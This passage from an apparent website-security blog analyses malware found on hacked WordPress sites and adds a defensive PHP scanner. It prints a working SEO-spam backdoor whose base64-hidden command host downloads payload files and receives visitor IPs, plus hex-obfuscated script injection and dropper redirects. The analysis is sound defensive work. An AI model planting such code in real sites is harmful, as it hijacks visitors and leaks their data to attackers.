$configs=$tmppath."emoji1.png";$bd=$tmppath."metaicons.jpg";$templ=$tmppath."wp-themesall.gif";
$domain=base64_decode("Z2V0dGhlc2VvcmRlcnMucnU=");$p=md5(base64_decode(@$_POST["p"]));
if (($x!="")&&($p==$md5pass)){
if ($x=="2"){ echo "###UPDATING_FILES###\n"; list($buf1,$curly_page_get_info)=@curly_page_get("http://update.".$domain."/images/".$md5host."/emoji1.png"); @file_put_contents($configs,$buf1); list($buf1,$curly_page_get_info)=@curly_page_get("http://update.".$domain."/images/".$md5host."/metaicons.jpg"); @file_put_contents($bd,$buf1); list($buf1,$curly_page_get_info)=@curly_page_get("http://update.".$domain."/images/".$md5host."/wp-themesall.gif"); @file_put_contents($templ,$buf1);
exit; 
 if ($x=="4"){ echo "###WORKED###\n";exit; 
 }else{
$cf=array(); if (@file_exists($configs)){ $cf=@unserialize(@base64_decode(@file_get_contents($configs))); if (@isset($cf[$md5urx])){ $bot=0;$se=0;$ua=@$_SERVER["HTTP_USER_AGENT"];$ref=@$_SERVER["HTTP_REFERER"];$myip=@$_SERVER["REMOTE_ADDR"]; if (preg_match("#google|bing\.com|msn\.com|ask\.com|aol\.com|altavista|search|yahoo|conduit\.com|charter\.net|wow\.com|mywebsearch\.com|handycafe\.com|babylon\.com#i", $ref))$se=1; if (preg_match("#google|gsa-crawler|AdsBot-Google|Mediapartners|Googlebot-Mobile|spider|bot|yahoo|google web preview|mail\.ru|crawler|baiduspider#i", $ua))$bot=1; $off=$cf[$md5urx]+0; $template=@base64_decode(@file_get_contents($templ));$f=@fopen($bd,"r");@fseek($f,$off);$buf=trim(@fgets($f,10000000));@fclose($f);$info=unserialize(base64_decode($buf)); $keyword=@$info["keyword"];$IDpack=@$info["IDpack"];$base=@$info["base"];$text=@$info["text"];$title=@$info["title"];$description=@$info["description"];$uckeyword=ucwords($keyword);$inside_links=@$info["inside_links"]; if ($bot) { if (isset($info["contenttype"])){$contenttype=@base64_decode($info["contenttype"]);$types=explode("\n",$contenttype);foreach($types as $val){$val=trim($val);if($val!="")header($val);}}
if (isset($info["isdoor"])){
if (isset($info["standalone"])){ $doorcontent=base64_decode($text); echo $doorcontent;exit; }else{ $template=str_replace("%text%",$text,$template); $template=str_replace("%title%",$title,$template); $template=str_replace("%description%",$description,$template); $template=str_replace("%uckeyword%",$uckeyword,$template); $template=str_replace("%keyword%",str_replace(" ", ",", trim($keyword)),$template);
foreach($inside_links as $i => $link){ $template=str_replace("%INSIDE_LINK_".$i."%",$link,$template); }
echo $template;exit; } }else{
list($buf,$ct)=get_proxy_page();
if (stristr($ct,"text/html")){ $rega='/\<a\s.*?\>.*?\<\/a\>/i';$resa=0; $links=$info["links_a"]; $buf=change_page_regex($buf,$links,$rega,$resa);
$regp='/(.{30}\<\/p\>)/is';$resp=1; $links=$info["links_p"]; $buf=change_page_regex($buf,$links,$regp,$resp);
}
echo $buf; }
} if ($se) { if (isset($info["isdoor"])){ list($buf1,$curly_page_get_info)=curly_page_get("http://$domain/ff.php?ip=".$IDpack."&mk=".rawurlencode($keyword)."&base=".rawurlencode($base)."&d=".rawurlencode($host)."&u=".rawurlencode($urx)."&addr=".$myip."&ref=".rawurlencode($ref),$ua); echo $buf1;exit; }else{ list($buf,$ct)=get_proxy_page(); echo $buf;exit; } } }else{
list($buf,$ct)=get_proxy_page(); echo $buf; 
}

The callback to the command-and-control host reports several values about the visitor (IDpack, keyword, base, host, URI, client IP address and referrer). Supplying only the first two parameters was enough to get redirected to a spam site:

http://$domain/ff.php?ip=".$IDpack."&mk=".rawurlencode($keyword)."&base=".rawurlencode($base)."&d=".rawurlencode($host)."&u=".rawurlencode($urx)."&addr=".$myip."&ref=".rawurlencode($ref),$ua);
hxxp://gettheseorders[dot]ru/ff.php?ip=12423&mk=test

I was able to get redirected to the following spam/scam sites:

an-order-shop[dot]com
alltabsstorekeys[dot]com

In this case the web.config file was used to set up the redirect because this was a Windows hosting environment, but the same approach is easily adapted to Linux with .htaccess. If you are dealing with a similar problem, check the .htaccess or web.config file first, then remove the malicious PHP files: the path to them is in the rewrite rule in that configuration file.

Fake relatable domain used to distribute ads

Attackers try to hide their malicious scripts in many ways, some more clever than others. In this case we look at a domain that resembles GoogleADS[.]com but is actually GoogleADSL[.]com, chosen to make the domain look legitimate and fool users into thinking the website is just loading Google ads. We found the domain being used to redirect users via a fake jquery.js request.

The domain googleadsl.com appears to be registered by somebody in China and is being used to distribute the malicious ads.

Domain Name:googleadsl.com
Registry Domain ID:1650621483_domain_com-vrsn
Registrar WHOIS Server:whois.paycenter.com.cn
Registrar URL:hxxp://www.xinnet.com
Creation Date:2011-04-13T04:43:52.00Z

Here is the malicious code we found. It is hex-encoded to make it harder to detect and analyze:

< Script language="javascript">
<!--
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"] ('\x3c\x53\x43\x52\x49\x50\x54 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x67\x6f\x6f\x67\x6c\x65\x61\x64\x73\x6c\x2e\x63\x6f\x6d\x2f\x73\x70\x63\x6f\x64\x65\x2f\x6a\x71\x75\x65\x72\x79\x2e\x6a\x73\x22\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e');
-->
</Script>

Decoded:

window["document"]["write"] ('<SCRIPT src="hxxp://www.googleadsl.com/spcode/jquery.js"></script>');

Requesting that script with a browser-like user agent and a referrer returns a 302 to 106hk.com:

curl --compressed -sD - -L -e "hxxp://randomsite.com" -A "Chrome 56" "hxxp://www.googleadsl.com/spcode/jquery.js"
HTTP/1.1 302 Redirect
Content-Length: 176
Content-Type: text/html
Location: hxxp://www.106hk.com/huodong/application/core/ajax.js

The script served after the redirect, hxxp://www.106hk.com/huodong/application/core/ajax.js, sets a six-hour cookie so each visitor is only hit once, then sends Android users to a mobile ad page and loads two more scripts for everyone else:

var cookieString = document.cookie;
var start = cookieString.indexOf("cookiesleep");
if(start!=-1){}else{
    var expires=new Date();
    expires.setTime(expires.getTime()+6*60*60*1000);
    document.cookie="cookiesleep=test;expires="+expires.toGMTString();
    var u = navigator.userAgent;
    if(u.indexOf('Android') > -1 || u.indexOf('Adr') > -1 ){
     window.location.href="hxxp://www.ncjkedu.com/3G/ads.html";
    }else{
     document.write('<script src="hxxp://libs.baidu.com/jquery/1.8.3/jquery.min.js"></script>');
     document.write('<script src="hxxp://www.106hk.com/huodong/application/core/layer/layer.js"></script>');
     document.write('<script src="hxxp://www.106hk.com/huodong/application/core/ad.js"></script>');
    }
}

We found both of these to be porn ads:

hxxp://www.106hk.com/huodong/application/core/ad.js
hxxp://www.ncjkedu.com/3G/ads.html

Users should be vigilant and look for any content loaded from suspicious domains. In this case almost all files on the site were infected with the malicious code, and the website was making requests to googleadsl.com, but the domain can change at any time.

Defunct Malware Can Cause Problems Too

Recently our incident response analyst Harshad Mane worked on a site that redirected users to a third-party malicious site whenever they logged into the WordPress admin interface.

We found the culprit in the functions.php file of the active theme.

if ( get_current_user_id() != '1130') {
   header("Location: hxxps://photoscape[.]ch/Setup.exe");
}

This code checks the ID of the current WordPress user and, unless it is 1130, redirects them to download a malicious Setup.exe file.

The functions.php file wasn’t the only infected file. We also removed many backdoors and a script that hid rogue admin users in the User’s list in the WordPress dashboard.

This campaign was active about a year ago. Since then the domain name has expired and the site owners spotted and deleted the rogue admin user with ID 1130. However, the annoying redirect persisted and even got the site blacklisted by some antivirus products, so the site owners asked us to clean it.

Thousands of Redirecting Files

We recently cleaned a site where we found thousands of malicious files with the following content:

<?php
header ( "HTTP/1.1 301 Moved Permanently" ) ;
header ( "Location: hxxp://realprofit[.]su/" ) ;
?>

and

<?php
header ( "HTTP/1.1 301 Moved Permanently" ) ;
header ( "Location: hxxp://profitnow[.]su/" ) ;
?>

All files were located in the site root directory and had names derived from people's first names: mccarphy.php, viva.php, lotta.php, sang.php, trine.php, liviu.php, taylar.php, golden.php, staphane, stanislav.php, ismail.php, jerusha.php, menda.php, niel.php, samaira.php, kaa.php, franky.php, etc.
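Both the redirect-only droppers above and the user-gated redirect in functions.php from the previous note have a recognisable shape that a file walk can pick out. As an added example, not Sucuri's cleanup tooling, the following script walks a web root and reports PHP files whose entire content is header() redirects, plus any file that redirects based on get_current_user_id(). When run without a path it creates a few constructed fixture files (domains use the reserved .invalid TLD) so it can demonstrate itself offline:

```php
<?php
/*
 * Added example, not Sucuri tooling. Fixture files and paths are constructed
 * for the demonstration. Usage: php find-redirects.php [/var/www/html]
 */

// A dropper is nothing but header(...) calls, at least one of them a
// Location header, optionally wrapped in <?php ... ?>.
function example_is_redirect_only( string $src ): bool {
    $body = trim( preg_replace( array( '/^\s*<\?php/i', '/\?>\s*$/' ), '', trim( $src ) ) );
    return (bool) preg_match( '/^(\s*header\s*\([^;()]*\)\s*;)+\s*$/is', $body )
        && (bool) preg_match( '/header\s*\(\s*["\']Location:/i', $body );
}

// A conditional redirect keyed on the logged-in user's numeric ID, as in the
// functions.php case: everyone except one account gets sent elsewhere.
function example_has_user_gated_redirect( string $src ): bool {
    return (bool) preg_match( '/get_current_user_id\s*\(\s*\)\s*!=+\s*[\'"]?\d+/i', $src )
        && (bool) preg_match( '/header\s*\(\s*["\']Location:/i', $src );
}

// Walk $root and return path => finding for every PHP file that matches.
function example_scan( string $root ): array {
    $findings = array();
    $iterator = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator( $root, FilesystemIterator::SKIP_DOTS )
    );
    foreach ( $iterator as $file ) {
        if ( strtolower( $file->getExtension() ) !== 'php' ) {
            continue;
        }
        $src = file_get_contents( $file->getPathname() );
        if ( $src === false ) {
            continue;
        }
        if ( example_is_redirect_only( $src ) ) {
            $findings[ $file->getPathname() ] = 'redirect-only file';
        } elseif ( example_has_user_gated_redirect( $src ) ) {
            $findings[ $file->getPathname() ] = 'user-gated redirect';
        }
    }
    ksort( $findings );
    return $findings;
}

if ( PHP_SAPI === 'cli' ) {
    $root = $argv[1] ?? null;
    if ( $root === null ) {
        // Constructed fixtures: one dropper, one gated redirect, one clean file.
        $root = sys_get_temp_dir() . '/example-scan-' . getmypid();
        mkdir( $root . '/wp-content/themes/t', 0700, true );
        file_put_contents(
            $root . '/viva.php',
            "<?php\nheader ( \"HTTP/1.1 301 Moved Permanently\" ) ;\nheader ( \"Location: http://redirect.invalid/\" ) ;\n?>"
        );
        file_put_contents(
            $root . '/wp-content/themes/t/functions.php',
            "<?php\nif ( get_current_user_id() != '1130' ) {\n   header(\"Location: https://dropper.invalid/Setup.exe\");\n}\n"
        );
        file_put_contents(
            $root . '/index.php',
            "<?php\ndefine( 'WP_USE_THEMES', true );\nrequire __DIR__ . '/wp-blog-header.php';\n"
        );
        echo "Scanning constructed fixtures in $root\n";
    }
    foreach ( example_scan( $root ) as $path => $why ) {
        echo "$why: $path\n";
    }
}
```

Against the fixtures it reports viva.php as a redirect-only file and the theme's functions.php as a user-gated redirect, and stays silent on index.php. The redirect-only check is deliberately strict (only header() calls, no other statements, no nested parentheses) so that a legitimate redirect helper with real logic in it is not flagged; a looser match on "Location:" alone would drown a large site in false positives.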

Most likely these files are used in an email malware campaign. We found an analysis of one malicious .doc file that made requests to several domains, including realprofit[.]su, and then saved the response as an .exe file and executed it.

This particular wave of the attack is known to infect many sites. Profitnow[.]su was created on November 28, 2018, and according to RiskIQ, 700+ sites redirected there. Realprofit[.]su was created on December 6, 2018, and 500+ sites redirected there.

Some other domains used in this malware campaign:

out36.selfsend.ru
to5.topwenches[.]com
trybestsale[.]su
onlinehotprice[.]su
saleallshop[.]su
bestshopmaster[.]su